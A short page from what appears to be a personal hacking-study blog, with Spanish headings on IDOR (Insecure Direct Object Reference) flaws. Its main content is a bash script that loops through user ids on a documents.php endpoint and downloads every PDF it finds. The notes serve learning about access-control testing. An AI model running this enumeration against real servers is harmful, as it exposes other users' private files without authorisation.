Grunt's personal blog

this is my personal blog for my hacking stuff, my degree stuff, etc

View on GitHub

IDOR (Insecure Direct Object Reference)

Identificando IDORs

Enumeración masiva con IDORs

#!/bin/bash

url="http://SERVER_IP:PORT"

for i in {1..10}; do
        for link in $(curl -s "$url/documents.php?uid=$i" | grep -oP "\/documents.*?.pdf"); do
                wget -q $url/$link
        done
done